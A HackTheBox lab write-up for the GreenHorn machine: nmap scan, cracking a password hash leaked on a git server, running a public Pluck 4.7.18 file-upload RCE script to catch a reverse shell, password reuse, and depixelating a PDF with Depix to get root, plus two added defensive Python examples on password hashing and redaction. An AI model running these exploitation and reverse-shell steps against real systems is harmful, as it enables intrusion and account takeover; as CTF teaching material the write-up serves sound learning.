HackTheBox-Machines GreenHorn Writeup

kazma Security Researcher

Exploitation

As usual, start with nmap to see which services are open:

└──╼ [★]$ nmap -sV 10.10.11.25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-11 02:36 CDT
Nmap scan report for 10.10.11.25
Host is up (0.0024s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
3000/tcp open ppp?

Ports 22, 80 and 3000 are open, so there is probably a website. It redirects automatically to http://greenhorn.htb, so we add that to /etc/hosts:

└──╼ [★]$ sudo echo "10.10.11.25 greenhorn.htb" | sudo tee -a /etc/hosts
10.10.11.25 greenhorn.htb

Browsing around the site, there is an admin button at the bottom of the home page; clicking it shows:

[image: pluck admin login page]

Looking up what pluck is:

Pluck is your small and simple content management system, written in php. With pluck, you can easily manage your own website without knowledge of programming languages. Pluck focuses on ease of use and enables everyone to manage his own website. This makes pluck an excellent choice for every small website.

So it is a framework written in PHP that makes it easy to manage a website.

The small text on the left of the screenshot also shows pluck 4.7.18. A quick search shows this version is vulnerable; after reading up on how it is exploited, it turns out to be a file upload vulnerability. But first we need a way to log in. The initial nmap scan also found a service on port 3000; opening it in a browser reveals a self-hosted git server, and digging through the likely paths turns up:

[image: git server contents]

We can try to crack this hash with an online lookup service:
https://crackstation.net/

[image: crackstation result]

Password found: iloveyou1 -> log in to pluck
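Why a hash lifted from a repository falls to a lookup service in seconds, and what storage format would have resisted the same table, as an added example that is not code from the box, the writeup or crackstation. The writeup shows the git-server find only as a screenshot, so the example assumes the weakest case (an unsalted fast hash); the wordlist and passwords are constructed.

```python
"""Unsalted fast hash vs. salted memory-hard KDF for stored passwords.

Added example for this writeup, not code from the box or from crackstation.
The hash type exposed on the git server is only visible as a screenshot in
the writeup; this assumes the weakest case, an unsalted fast hash.
The wordlist and the passwords below are constructed."""
import hashlib
import hmac
import os

# Constructed mini wordlist. A lookup service precomputes the hashes of
# hundreds of millions of such entries once and then answers any query
# with a single dictionary lookup.
WORDLIST = ["password", "123456", "iloveyou", "iloveyou1", "qwerty", "letmein"]


def fast_hash(password: str) -> str:
    """Unsalted SHA-256: deterministic, so equal passwords give equal digests."""
    return hashlib.sha256(password.encode()).hexdigest()


def build_lookup_table(words=WORDLIST) -> dict:
    """Precompute digest -> plaintext for every word (done once, reused forever)."""
    return {fast_hash(w): w for w in words}


def reverse_fast_hash(digest: str, table=None):
    """Reverse an unsalted digest by table lookup; None when it is not in the table."""
    if table is None:
        table = build_lookup_table()
    return table.get(digest.lower())


# Hardened storage: a random per-user salt plus a memory-hard KDF (scrypt).
# Cost parameters are modest so the demo runs quickly (about 16 MiB per hash).
SCRYPT_PARAMS = dict(n=2 ** 14, r=8, p=1)


def make_record(password: str) -> dict:
    """Store salt and derived key; two users with the same password get different keys."""
    salt = os.urandom(16)
    key = hashlib.scrypt(password.encode(), salt=salt, dklen=32, **SCRYPT_PARAMS)
    return {"salt": salt.hex(), "key": key.hex()}


def verify_record(record: dict, password: str) -> bool:
    """Recompute the KDF with the stored salt and compare in constant time."""
    key = hashlib.scrypt(password.encode(), salt=bytes.fromhex(record["salt"]),
                         dklen=32, **SCRYPT_PARAMS)
    return hmac.compare_digest(key.hex(), record["key"])


if __name__ == "__main__":
    leaked = fast_hash("iloveyou1")
    print("unsalted sha256 reversed to:", reverse_fast_hash(leaked))
    rec = make_record("iloveyou1")
    print("scrypt record in lookup table:", reverse_fast_hash(rec["key"]))
    print("login with correct password:", verify_record(rec, "iloveyou1"))
```

The salted record is immune to a precomputed table because the salt has to be known before any work can start, and the work itself is expensive per guess. It does not make a password like iloveyou1 strong: a per-user dictionary run still finds it, which is why the second half of this box (reusing the same password for junior) matters as much as the storage format.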
A handy script found online:
https://github.com/b0ySie7e/Pluck_Cms_4.7.18_RCE_Exploit
Following the instructions in its README.md:

└──╼ [★]$ python exploit_pluckv4.7.18_RCE.py -h
usage: exploit_pluckv4.7.18_RCE.py [-h] --password PASSWORD [--filename FILENAME] --ip IP --port PORT --host HOST

Script para crear y subir un archivo ZIP malicioso.

options:
-h, --help show this help message and exit
--password PASSWORD Password para login
--filename FILENAME Nombre del archivo PHP a crear
--ip IP IP del atacante
--port PORT Puerto del atacante
--host HOST URL del host objetivo
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-m9chba7pro]─[~/Pluck_Cms_4.7.18_RCE_Exploit]
└──╼ [★]$ python exploit_pluckv4.7.18_RCE.py --password iloveyou1 --ip 10.10.14.22 --port 4444 --host http://greenhorn.htb
[+] Creating payload
[+] Overwriting .php file
[+] Creating ZIP file
Login successful
[+] ZIP file uploaded successfully

Reverse shell:

└──╼ [★]$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.11.25] 48094
bash: cannot set terminal process group (1099): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/mirabbas$

After getting the reverse shell, we can run python3 -c 'import pty;pty.spawn("/bin/bash")' to spawn a proper bash for a nicer experience, then look around and think about how to escalate privileges:

www-data@greenhorn:/home/junior$ pwd
pwd
/home/junior
www-data@greenhorn:/home/junior$ ls -al
ls -al
total 76
drwxr-xr-x 3 junior junior 4096 Jun 20 06:36 .
drwxr-xr-x 4 root root 4096 Jun 20 06:36 ..
lrwxrwxrwx 1 junior junior 9 Jun 11 14:38 .bash_history -> /dev/null
drwx------ 2 junior junior 4096 Jun 20 06:36 .cache
-rw-r----- 1 root junior 61367 Jun 11 14:39 'Using OpenVAS.pdf'
-rw-r----- 1 root junior 33 Aug 6 13:30 user.txt
www-data@greenhorn:/home/junior$ su junior
su junior
Password: iloveyou1

junior@greenhorn:~$

We find user.txt and something interesting, but both are owned by junior. Trying to switch to that user, the password turns out to be the same as before XD
Let's download that PDF to take a look, renaming it to something easier to type along the way:

junior@greenhorn:~$ mv 'Using OpenVAS.pdf' a.pdf               
mv 'Using OpenVAS.pdf' a.pdf
junior@greenhorn:~$ ls
ls
a.pdf user.txt
junior@greenhorn:~$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

└──╼ [★]$ wget http://10.10.11.25:8000/a.pdf
--2024-08-11 03:34:04-- http://10.10.11.25:8000/a.pdf
Connecting to 10.10.11.25:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 61367 (60K) [application/pdf]
Saving to: ‘a.pdf’

a.pdf 100%[=================================================================>] 59.93K --.-KB/s in 0.004s

2024-08-11 03:34:04 (14.1 MB/s) - ‘a.pdf’ saved [61367/61367]

Opening the PDF reveals a line of pixelated English text. The Depix tool can be used to undo the pixelation:
https://github.com/spipm/Depix
First we need to extract the pixelated part as a PNG; pdfimages can do this for us:

└──╼ [★]$ pdfimages -png a.pdf b.png
┌─[sg-vip-2]─[10.10.14.22]─[kazma@htb-m9chba7pro]─[~/Desktop]
└──╼ [★]$ ls
a.pdf b.png-000.png htb_vpn_logs.log my_credentials.txt my_data README.license
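Why a mosaic can be matched back to text at all, and why a solid box cannot, as an added toy illustration that is not code from this writeup or from the Depix project. The glyph bitmaps, the block size and the "text" are all constructed; the point is that the mosaic filter is deterministic, so anyone who can render candidate text the same way can pixelate it and compare cells.

```python
"""Why a mosaic can be matched back to text, and why a solid box cannot.

Added toy illustration for this writeup; it is not code from the post or
from the Depix project. Glyph bitmaps, block size and the 'text' are all
constructed here.
"""
from collections import defaultdict

GLYPH_W = 4   # every constructed glyph is 4 x 4 pixels
BLOCK = 2     # mosaic cell size, so each glyph becomes a 2 x 2 signature

# Constructed monochrome glyphs ('1' = ink). In Depix the same role is played
# by a screenshot of a De Bruijn sequence typed in the suspected editor/font.
GLYPHS = {
    "a": ("0110", "1001", "1111", "1001"),
    "b": ("1110", "1001", "1110", "1001"),
    "c": ("0111", "1000", "1000", "0111"),
    "o": ("0110", "1001", "1001", "0110"),  # collides with "c" after pixelation
}


def render(text):
    """Place glyphs side by side to form a 4-row bitmap of the text."""
    return ["".join(GLYPHS[ch][r] for ch in text) for r in range(GLYPH_W)]


def pixelate(rows, block=BLOCK):
    """Mosaic filter: each block x block cell is replaced by its ink count.
    A real filter averages colours; an integer sum carries the same information."""
    height, width = len(rows), len(rows[0])
    cells = []
    for y in range(0, height, block):
        cells.append(tuple(
            sum(int(rows[y + dy][x + dx]) for dy in range(block) for dx in range(block))
            for x in range(0, width, block)))
    return tuple(cells)


def build_lookup(glyphs=GLYPHS, block=BLOCK):
    """Pixelate every known glyph once and index glyph names by signature.
    This is the 'search image' step: the filter is deterministic, so the same
    glyph rendered the same way always yields the same cell values."""
    table = defaultdict(list)
    for name, rows in glyphs.items():
        table[pixelate(rows, block)].append(name)
    return {sig: sorted(names) for sig, names in table.items()}


def depixelate(mosaic, lookup, block=BLOCK):
    """Cut the mosaic into glyph-wide column groups and look each one up.
    Returns one candidate list per position: one name is a straight match,
    several names are 'multiple matches', and [] means no match at all."""
    cols = GLYPH_W // block
    positions = len(mosaic[0]) // cols
    return [lookup.get(tuple(row[i * cols:(i + 1) * cols] for row in mosaic), [])
            for i in range(positions)]


def solid_redact(rows):
    """Proper redaction: overwrite the region with a solid colour, so every
    glyph produces identical cells and there is nothing left to match."""
    return ["1" * len(r) for r in rows]


if __name__ == "__main__":
    lookup = build_lookup()
    secret = "cab"
    print("pixelated :", depixelate(pixelate(render(secret)), lookup))
    print("solid box :", depixelate(pixelate(solid_redact(render(secret))), lookup))
```

The "straight matches" and "multiple matches" counters in the Depix log further down are the full-size version of the same thing: the c/o collision in this toy is what Depix tries to resolve with geometric context and, failing that, averages. The defensive takeaway is that pixelation and blur are filters, not redaction; content that must not be recovered has to be removed and replaced with a flat box.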

Next, feed the image to Depix:

└──╼ [★]$ python3 depix.py \
-p ~/Desktop/b.png-000.png \
-s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png \
-o ./output.png
2024-08-11 04:07:08,652 - Loading pixelated image from /home/kazma/Desktop/b.png-000.png
2024-08-11 04:07:08,667 - Loading search image from images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png
2024-08-11 04:07:09,174 - Finding color rectangles from pixelated space
2024-08-11 04:07:09,175 - Found 252 same color rectangles
2024-08-11 04:07:09,175 - 190 rectangles left after moot filter
2024-08-11 04:07:09,175 - Found 1 different rectangle sizes
2024-08-11 04:07:09,175 - Finding matches in search image
2024-08-11 04:07:09,175 - Scanning 190 blocks with size (5, 5)
2024-08-11 04:07:09,200 - Scanning in searchImage: 0/1674
2024-08-11 04:07:49,084 - Removing blocks with no matches
2024-08-11 04:07:49,084 - Splitting single matches and multiple matches
2024-08-11 04:07:49,088 - [16 straight matches | 174 multiple matches]
2024-08-11 04:07:49,088 - Trying geometrical matches on single-match squares
2024-08-11 04:07:49,367 - [29 straight matches | 161 multiple matches]
2024-08-11 04:07:49,367 - Trying another pass on geometrical matches
2024-08-11 04:07:49,607 - [41 straight matches | 149 multiple matches]
2024-08-11 04:07:49,607 - Writing single match results to output
2024-08-11 04:07:49,608 - Writing average results for multiple matches to output
2024-08-11 04:07:52,646 - Saving output image to: ./output.png

Looking at the result:

[image: Depix output]

The recovered password is: sidefromsidetheothersidesidefromsidetheotherside
Let's try it right away:

www-data@greenhorn:/$ su root
su root
Password: sidefromsidetheothersidesidefromsidetheotherside

root@greenhorn:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@greenhorn:/# find / -name 'root.txt' 2>/dev/null
find / -name 'root.txt' 2>/dev/null
/root/root.txt

Pwned !!!

[image: green]

  • Title: HackTheBox-Machines GreenHorn Writeup
  • Author: kazma
  • Created at : 2024-08-11 11:36:07
  • Updated at : 2025-08-20 13:53:24
  • Link: https://kazma.tw/2024/08/11/HackTheBox-Machines-GreenHorn-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.